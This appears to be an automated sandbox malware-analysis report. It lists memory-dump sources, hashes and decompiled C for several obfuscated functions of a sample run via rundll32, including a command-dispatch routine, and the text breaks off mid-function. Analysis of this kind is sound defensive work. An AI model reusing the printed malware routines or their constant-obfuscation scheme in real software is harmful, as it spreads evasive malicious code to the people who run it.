Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: 90d64581cd0bf1be9f4ad65f7c138d495ffbda372ecda143036d11280657633e
Instruction ID: 7efd4e9a6f6185843bf9655f54d38c8024e1028a7ef161bcb6134e16c066a441
Opcode Fuzzy Hash: 90d64581cd0bf1be9f4ad65f7c138d495ffbda372ecda143036d11280657633e
Instruction Fuzzy Hash: 8CB126756007429FD729DB24CCA2BBBB3E8EF44349F55452DF9438A680EAB5F985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 100357C0, Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c75734fa062886162f5a594cbc56912a5c3b6ea2c12dfbddb6b670a93a118ef
Instruction ID: 1537f683cadf3bf9a53e2a0a1a141fb3b9880c430cf9a34166f07beff673fd32
Opcode Fuzzy Hash: 4c75734fa062886162f5a594cbc56912a5c3b6ea2c12dfbddb6b670a93a118ef
Instruction Fuzzy Hash: 63916A75A001698FCB26CF18C891BDEB7F5EB89356F1581EADC0DAB250E7319E418F81

Uniqueness

Uniqueness Score: -1.00%

Function 00B35D1D, Relevance: .2, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00B35D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _t165;
				intOrPtr* _t183;
				void* _t185;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;

				_t183 = _a24;
				_push(_t183);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00B2602B(_t165);
				_v96 = 0x1c20a7;
				_t194 = 0;
				_v84 = _v84 & 0;
				_t199 = _t198 + 0x20;
				_v92 = 0x7c153;
				_v88 = 0xb2086;
				_t185 = 0x2476afb9;
				_v8 = 0x4175;
				_v8 = _v8 + 0xffff57ff;
				_v8 = _v8 | 0xfffbf4ff;
				_v8 = _v8 ^ 0xffffd856;
				_v56 = 0x400d;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x01004a82;
				_v52 = 0xfa4b;
				_t195 = 0x3f;
				_v52 = _v52 * 0xf;
				_v52 = _v52 ^ 0x000ed31b;
				_v48 = 0x532b;
				_v48 = _v48 | 0xa8aca4f9;
				_v48 = _v48 ^ 0xa8acfbbc;
				_v44 = 0x6cab;
				_v44 = _v44 * 0xd;
				_v44 = _v44 ^ 0x0005813c;
				_v32 = 0xa076;
				_v32 = _v32 + 0x7ba7;
				_v32 = _v32 * 0x33;
				_v32 = _v32 ^ 0x0038af53;
				_v28 = 0x80ef;
				_v28 = _v28 << 0xb;
				_v28 = _v28 | 0xbfaa7514;
				_v28 = _v28 ^ 0xbfaf1f10;
				_v24 = 0x2421;
				_v24 = _v24 / _t195;
				_t196 = 3;
				_v24 = _v24 / _t196;
				_v24 = _v24 ^ 0x000050e2;
				_v68 = 0xf6e5;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0000085c;
				_v64 = 0x7950;
				_v64 = _v64 | 0xc26498fa;
				_v64 = _v64 ^ 0xc264e84e;
				_v60 = 0xb7cc;
				_v60 = _v60 + 0xffffacef;
				_v60 = _v60 ^ 0x0000478a;
				_v40 = 0x6379;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 << 5;
				_v40 = _v40 ^ 0x00006e22;
				_v20 = 0xe665;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0xe4ef8652;
				_v20 = _v20 + 0xffffeafe;
				_v20 = _v20 ^ 0xe52339cd;
				_v80 = 0x4d1e;
				_v80 = _v80 + 0xffffc710;
				_v80 = _v80 ^ 0x000046ed;
				_v16 = 0x18c;
				_v16 = _v16 >> 4;
				_t197 = _v80;
				_v16 = _v16 * 0x41;
				_v16 = _v16 ^ 0x73128289;
				_v16 = _v16 ^ 0x7312c7aa;
				_v12 = 0xdd0b;
				_v12 = _v12 + 0xffff65de;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x0f6bc641;
				_v76 = 0xf5b7;
				_v76 = _v76 ^ 0xdca6f1c9;
				_v76 = _v76 ^ 0xdca64fd3;
				_v36 = 0xdf9f;
				_v36 = _v36 + 0x7ffe;
				_v36 = _v36 + 0x4fda;
				_v36 = _v36 ^ 0x00019ee0;
				_v72 = 0x5c39;
				_v72 = _v72 ^ 0x85106c7e;
				_v72 = _v72 ^ 0x85105bd4;
				do {
					while(_t185 != 0x6efb3d4) {
						if(_t185 == 0xfd0cdc7) {
							_t197 = E00B396CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
							_t199 = _t199 + 0x38;
							if(_t197 == 0) {
								L15:
								return _t194;
							}
							_t185 = 0x6efb3d4;
							continue;
						}
						if(_t185 == 0x1eddc4e8) {
							E00B396CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
							if(_t183 != 0) {
								 *_t183 = _t197;
							}
							goto L15;
						}
						if(_t185 != 0x2476afb9) {
							goto L11;
						}
						_t185 = 0xfd0cdc7;
					}
					_push(_t185);
					_push(_t185);
					_t194 = E00B28736(_t197);
					if(_t194 == 0) {
						_t185 = 0x710c028;
						goto L11;
					}
					_t185 = 0x1eddc4e8;
					continue;
					L11:
				} while (_t185 != 0x710c028);
				goto L15;
			}

0x00b35d24
0x00b35d29
0x00b35d2a
0x00b35d2d
0x00b35d30
0x00b35d33
0x00b35d36
0x00b35d3a
0x00b35d3b
0x00b35d40
0x00b35d47
0x00b35d49
0x00b35d4c
0x00b35d4f
0x00b35d58
0x00b35d5f
0x00b35d64
0x00b35d6b
0x00b35d72
0x00b35d79
0x00b35d80
0x00b35d87
0x00b35d8b
0x00b35d92
0x00b35d9f
0x00b35da2
0x00b35da5
0x00b35dac
0x00b35db3
0x00b35dba
0x00b35dc1
0x00b35dcc
0x00b35dcf
0x00b35dd6
0x00b35ddd
0x00b35de8
0x00b35deb
0x00b35df2
0x00b35df9
0x00b35dfd
0x00b35e04
0x00b35e0b
0x00b35e19
0x00b35e1f
0x00b35e22
0x00b35e25
0x00b35e2c
0x00b35e33
0x00b35e37
0x00b35e3e
0x00b35e45
0x00b35e4c
0x00b35e53
0x00b35e5a
0x00b35e61
0x00b35e68
0x00b35e6f
0x00b35e73
0x00b35e77
0x00b35e7e
0x00b35e85
0x00b35e89
0x00b35e90
0x00b35e97
0x00b35e9e
0x00b35ea5
0x00b35eac
0x00b35eb3
0x00b35eba
0x00b35ec2
0x00b35ec5
0x00b35ec8
0x00b35ecf
0x00b35ed6
0x00b35edd
0x00b35ee8
0x00b35eeb
0x00b35eef
0x00b35ef6
0x00b35efd
0x00b35f04
0x00b35f0b
0x00b35f12
0x00b35f19
0x00b35f20
0x00b35f27
0x00b35f2e
0x00b35f35
0x00b35f3c
0x00b35f3c
0x00b35f4a
0x00b35f92
0x00b35f94
0x00b35f99
0x00b3600b
0x00b36013
0x00b36013
0x00b35f9b
0x00000000
0x00b35f9b
0x00b35f52
0x00b35ffd
0x00b36007
0x00b36009
0x00b36009
0x00000000
0x00b36007
0x00b35f5e
0x00000000
0x00000000
0x00b35f60
0x00b35f60
0x00b35fab
0x00b35fac
0x00b35fb4
0x00b35fba
0x00b35fc6
0x00000000
0x00b35fc6
0x00b35fbc
0x00000000
0x00b35fcb
0x00b35fcb
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction ID: 1e23315c9c18dca06a06ee61361dc1f08b0b07969b7eb3f1a389cf178d5d361f
Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction Fuzzy Hash: 55913772C0021AABDF19CFE5D98A5EEBFB1FF04314F208149E61176260D7B94A15CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00B30F0C, Relevance: .2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00B30F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t132;
				signed int _t149;
				void* _t152;
				void* _t154;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t181;

				_push(_a20);
				_t152 = __edx;
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t132);
				_v44 = 0x160;
				_t181 = _t180 + 0x1c;
				_v44 = _v44 ^ 0x1b432315;
				_v44 = _v44 ^ 0x1b433d06;
				_t179 = 0;
				_v12 = 0x3352;
				_t154 = 0x2476afb9;
				_v12 = _v12 + 0xffffca9f;
				_v12 = _v12 << 1;
				_t173 = 0x29;
				_v12 = _v12 / _t173;
				_v12 = _v12 ^ 0x063e5c60;
				_v8 = 0x701a;
				_t174 = 0x52;
				_v8 = _v8 / _t174;
				_t175 = 0x4e;
				_v8 = _v8 / _t175;
				_t176 = 0x41;
				_v8 = _v8 / _t176;
				_v8 = _v8 ^ 0x0000431a;
				_v40 = 0xf48c;
				_v40 = _v40 + 0xffff0dc2;
				_v40 = _v40 ^ 0x0000090f;
				_v36 = 0x5475;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x2a3aa88b;
				_v16 = 0xfc71;
				_v16 = _v16 ^ 0x0a975394;
				_v16 = _v16 | 0x3f9daa18;
				_v16 = _v16 + 0xffff523a;
				_v16 = _v16 ^ 0x3f9f63b5;
				_v48 = 0xbfc9;
				_t177 = 0x63;
				_v48 = _v48 / _t177;
				_v48 = _v48 ^ 0x0000151a;
				_v32 = 0xfc2a;
				_v32 = _v32 | 0x12ce1451;
				_v32 = _v32 + 0x3ff4;
				_v32 = _v32 ^ 0x12cf51f6;
				_v56 = 0x5ac8;
				_v56 = _v56 | 0xf85dcbd1;
				_v56 = _v56 ^ 0xf85dd81d;
				_v52 = 0x6e3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x0006be09;
				_v28 = 0x1612;
				_v28 = _v28 ^ 0x471c56e0;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xffff1cc1;
				_v28 = _v28 ^ 0x238d2d3e;
				_v24 = 0x515e;
				_v24 = _v24 + 0x963f;
				_v24 = _v24 + 0xffff7349;
				_t178 = _v56;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000650d8;
				_v20 = 0x1a04;
				_v20 = _v20 | 0x2258a5ab;
				_v20 = _v20 + 0xffff2fa3;
				_v20 = _v20 + 0x9894;
				_v20 = _v20 ^ 0x2258a793;
				do {
					while(_t154 != 0x6efb3d4) {
						if(_t154 == 0xfd0cdc7) {
							_t149 = E00B37AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
							_t178 = _t149;
							_t181 = _t181 + 0x24;
							if(_t149 != 0) {
								_t154 = 0x6efb3d4;
								continue;
							}
						} else {
							if(_t154 == 0x1eddc4e8) {
								E00B37AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
							} else {
								if(_t154 != 0x2476afb9) {
									goto L11;
								} else {
									_t154 = 0xfd0cdc7;
									continue;
								}
							}
						}
						L14:
						return _t179;
					}
					_push(_t154);
					_push(_t154);
					_t179 = E00B28736(_t178 + _t178);
					if(_t179 == 0) {
						_t154 = 0x710c028;
						goto L11;
					} else {
						_t154 = 0x1eddc4e8;
						continue;
					}
					goto L14;
					L11:
				} while (_t154 != 0x710c028);
				goto L14;
			}

0x00b30f15
0x00b30f18
0x00b30f1a
0x00b30f1c
0x00b30f1f
0x00b30f22
0x00b30f24
0x00b30f25
0x00b30f26
0x00b30f2b
0x00b30f32
0x00b30f35
0x00b30f3e
0x00b30f45
0x00b30f47
0x00b30f4e
0x00b30f53
0x00b30f5a
0x00b30f62
0x00b30f67
0x00b30f6c
0x00b30f73
0x00b30f7d
0x00b30f82
0x00b30f8a
0x00b30f8f
0x00b30f97
0x00b30f9c
0x00b30fa1
0x00b30fa8
0x00b30faf
0x00b30fb6
0x00b30fbd
0x00b30fc4
0x00b30fc8
0x00b30fcf
0x00b30fd6
0x00b30fdd
0x00b30fe4
0x00b30feb
0x00b30ff2
0x00b30ffc
0x00b30fff
0x00b31002
0x00b31009
0x00b31010
0x00b31017
0x00b3101e
0x00b31025
0x00b3102c
0x00b31033
0x00b3103a
0x00b31041
0x00b31045
0x00b3104c
0x00b31053
0x00b3105a
0x00b3105d
0x00b31064
0x00b3106b
0x00b31072
0x00b31079
0x00b31084
0x00b31087
0x00b3108a
0x00b31091
0x00b31098
0x00b3109f
0x00b310a6
0x00b310ad
0x00b310b4
0x00b310b4
0x00b310c2
0x00b310f5
0x00b310fa
0x00b310fc
0x00b31101
0x00b31103
0x00000000
0x00b31103
0x00b310c4
0x00b310ca
0x00b31157
0x00b310cc
0x00b310d2
0x00000000
0x00b310d4
0x00b310d4
0x00000000
0x00b310d4
0x00b310d2
0x00b310ca
0x00b31160
0x00b31167
0x00b31167
0x00b31113
0x00b31114
0x00b3111d
0x00b31123
0x00b3112c
0x00000000
0x00b31125
0x00b31125
0x00000000
0x00b31125
0x00000000
0x00b31131
0x00b31131
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction ID: 2b496ac9075ea13100dcd0e794f85490f7a5d67d57ae294a53196d205a3df0b5
Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction Fuzzy Hash: 04618D72D01309EBDF18CFA9D9859EEBBB6FF48310F248259E512B6290D7B54A418F90

Uniqueness

Uniqueness Score: -1.00%

Function 00B2F444, Relevance: .1, Instructions: 128
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00B2F444(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				void* _t159;
				void* _t160;

				_t128 = __ecx;
				_t152 =  *0xb3ca24; // 0x0
				while(_t152 != 0) {
					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
					}
					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
				}
				_t129 = _t128 | 0xffffffff;
				_pop(_t153);
				_t160 = _t159 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_t126 = _t129;
				_t149 = 0xb3ca24;
				_t130 = 0x77;
				_v8 = _v8 / _t130;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_t131 = 0x67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / _t131;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t154 =  *0xb3ca24; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
						L10:
						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
						_t120 = E00B2F536(_v20, _v40, _v48, _t154);
					} else {
						_t120 = E00B3086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
						_t160 = _t160 + 0xc;
						if(_t120 != _v28) {
							_t112 = _t154 + 0x2c; // 0x2c
							_t149 = _t112;
						} else {
							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
							E00B3422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
							E00B34F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
							goto L10;
						}
					}
					_t154 =  *_t149;
				}
				return _t120;
			}

0x00b2f444
0x00b2f445
0x00b2f460
0x00b2f451
0x00b2f45a
0x00b2f45a
0x00b2f45d
0x00b2f45d
0x00b2f464
0x00b2f467
0x00b398a6
0x00b398a9
0x00b398b2
0x00b398c1
0x00b398c3
0x00b398c8
0x00b398cd
0x00b398d2
0x00b398d6
0x00b398dd
0x00b398e8
0x00b398e9
0x00b398ec
0x00b398f3
0x00b398fa
0x00b39901
0x00b39905
0x00b3990c
0x00b39913
0x00b3991c
0x00b3991f
0x00b39926
0x00b3992d
0x00b39934
0x00b39937
0x00b3993b
0x00b39942
0x00b39949
0x00b3994d
0x00b39951
0x00b39958
0x00b3995f
0x00b39966
0x00b3996a
0x00b39971
0x00b39978
0x00b3997f
0x00b39986
0x00b3998d
0x00b39994
0x00b3999b
0x00b399a6
0x00b399a9
0x00b399b0
0x00b399b7
0x00b399be
0x00b399c1
0x00b399c8
0x00b399cf
0x00b399d3
0x00b399d7
0x00b399de
0x00b39a46
0x00b399ea
0x00b39a2e
0x00b39a3b
0x00b39a3d
0x00b399ec
0x00b399f9
0x00b399fe
0x00b39a04
0x00b39a51
0x00b39a51
0x00b39a06
0x00b39a0d
0x00b39a19
0x00b39a27
0x00000000
0x00b39a2d
0x00b39a04
0x00b39a44
0x00b39a44
0x00b39a50

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f8892d0d77553decf85ecab244e49b37db5937928e049e6bd8a686fd73ff1ef
Instruction ID: c65eed8988296972f63cb8d2593dd95ad0be50316513ac279b4738e4988a2346
Opcode Fuzzy Hash: 4f8892d0d77553decf85ecab244e49b37db5937928e049e6bd8a686fd73ff1ef
Instruction Fuzzy Hash: 9D515432D00719DBDB18DFA5D98A9EEBBF0FB08318F208199D516772A0C7B46A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00B371EF, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B371EF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v144;
				void* __ecx;
				void* _t94;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t120;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t147;

				_t147 = __eflags;
				_push(_a4);
				_push(__edx);
				E00B2602B(_t94);
				_v20 = 0xa5d0;
				_v20 = _v20 | 0x3487ecbd;
				_v20 = _v20 + 0xffff03d0;
				_t142 = 0;
				_v20 = _v20 + 0x3a47;
				_v20 = _v20 ^ 0x348731c7;
				_v28 = 0xdd31;
				_v28 = _v28 << 0x10;
				_v28 = _v28 | 0x8f0862d8;
				_v28 = _v28 ^ 0xdf391de9;
				_v16 = 0xb0e;
				_v16 = _v16 << 4;
				_v16 = _v16 << 0xa;
				_t120 = 0x14;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x461d447c;
				_v12 = 0xa74;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0x835b;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0053bc14;
				_v36 = 0xa6cf;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x000104b7;
				_v24 = 0x4d22;
				_v24 = _v24 >> 6;
				_v24 = _v24 + 0xef2f;
				_v24 = _v24 ^ 0x0000ed15;
				_v44 = 0x3931;
				_v44 = _v44 * 0x11;
				_v44 = _v44 ^ 0x00039362;
				_v40 = 0xec47;
				_v40 = _v40 ^ 0x28f00c99;
				_v40 = _v40 ^ 0x28f09017;
				_v32 = 0x2800;
				_v32 = _v32 / _t120;
				_v32 = _v32 ^ 0x971b94ed;
				_v32 = _v32 ^ 0x971b9d0a;
				E00B350F2( &_v144, _v20, _v28, _v16, __edx);
				_t146 = _t144 + 0x18;
				L13:
				if(E00B2B055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
					_t106 = E00B21280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
					_t146 = _t146 + 0x10;
					__eflags = _t106;
					if(__eflags != 0) {
						_t108 = _v56 - 1;
						__eflags = _t108;
						if(_t108 == 0) {
							E00B26754(_v60,  &_v52);
						} else {
							_t110 = _t108 - 1;
							__eflags = _t110;
							if(_t110 == 0) {
								E00B28F78(_v60,  &_v52);
							} else {
								_t112 = _t110 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									E00B326F5(_v60,  &_v52);
								} else {
									_t114 = _t112 - 1;
									__eflags = _t114;
									if(_t114 == 0) {
										E00B24A35(_v60,  &_v52);
									} else {
										__eflags = _t114 == 6;
										if(_t114 == 6) {
											E00B269A0(_v60,  &_v52);
										}
									}
								}
							}
						}
						_t142 = _t142 + 1;
						__eflags = _t142;
					}
					goto L13;
				}
				return _t142;
			}

0x00b371ef
0x00b371fa
0x00b371ff
0x00b37201
0x00b37206
0x00b37210
0x00b37219
0x00b37220
0x00b37222
0x00b37229
0x00b37230
0x00b37237
0x00b3723b
0x00b37242
0x00b37249
0x00b37250
0x00b37254
0x00b3725e
0x00b37260
0x00b37263
0x00b3726a
0x00b37271
0x00b37275
0x00b3727c
0x00b3727f
0x00b37286
0x00b3728d
0x00b37290
0x00b37297
0x00b3729e
0x00b372a2
0x00b372a9
0x00b372b0
0x00b372bb
0x00b372be
0x00b372c5
0x00b372cc
0x00b372d3
0x00b372da
0x00b372ec
0x00b372ef
0x00b372f6
0x00b37306
0x00b3730b
0x00b37384
0x00b3739e
0x00b37324
0x00b37329
0x00b3732c
0x00b3732e
0x00b37333
0x00b37333
0x00b37334
0x00b3737e
0x00b37336
0x00b37336
0x00b37336
0x00b37337
0x00b37371
0x00b37339
0x00b37339
0x00b37339
0x00b3733a
0x00b37364
0x00b3733c
0x00b3733c
0x00b3733c
0x00b3733d
0x00b37357
0x00b3733f
0x00b3733f
0x00b37342
0x00b3734a
0x00b3734a
0x00b37342
0x00b3733d
0x00b3733a
0x00b37337
0x00b37383
0x00b37383
0x00b37383
0x00000000
0x00b3732e
0x00b373ab

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction ID: d7a3cc5f9fa27b2c940c015ade67f7823fc3c426784e17615e27a57973092358
Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction Fuzzy Hash: 17516771D0421EEBDF14CFA0D8858EEBBB5FF44304F208199D412B6290DBB85A49CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B38ADC, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B38ADC(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t109;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				char* _t120;
				intOrPtr* _t139;
				void* _t140;

				_v44 = 0xbe2c;
				_v44 = _v44 | 0x84c59b93;
				_v44 = _v44 ^ 0x84c5dc14;
				_v12 = 0x6fb6;
				_v12 = _v12 << 0xc;
				_t139 = __ecx;
				_t117 = 0x2e;
				_v12 = _v12 / _t117;
				_v12 = _v12 + 0xcda3;
				_v12 = _v12 ^ 0x0027e688;
				_v28 = 0xcabb;
				_v28 = _v28 + 0xd310;
				_v28 = _v28 | 0x3c203c9f;
				_v28 = _v28 ^ 0x3c2189d4;
				_v36 = 0x4eab;
				_v36 = _v36 | 0x84b19700;
				_v36 = _v36 ^ 0x84b1b180;
				_v8 = 0xd8ee;
				_v8 = _v8 + 0xffff63d4;
				_v8 = _v8 ^ 0xfc264e39;
				_v8 = _v8 ^ 0x6fc556fb;
				_v8 = _v8 ^ 0x93e330d5;
				_v20 = 0x5c82;
				_v20 = _v20 | 0x7a047e0a;
				_v20 = _v20 << 5;
				_t118 = 0x1b;
				_v20 = _v20 * 0x43;
				_v20 = _v20 ^ 0xe5a3df6f;
				_v40 = 0x7499;
				_v40 = _v40 >> 8;
				_v40 = _v40 ^ 0x0000130c;
				_v16 = 0x5702;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffffa72f;
				_v16 = _v16 ^ 0x15c040b7;
				_v32 = 0x67e1;
				_v32 = _v32 / _t118;
				_v32 = _v32 ^ 0x8e6cf5d6;
				_v32 = _v32 ^ 0x8e6ccf96;
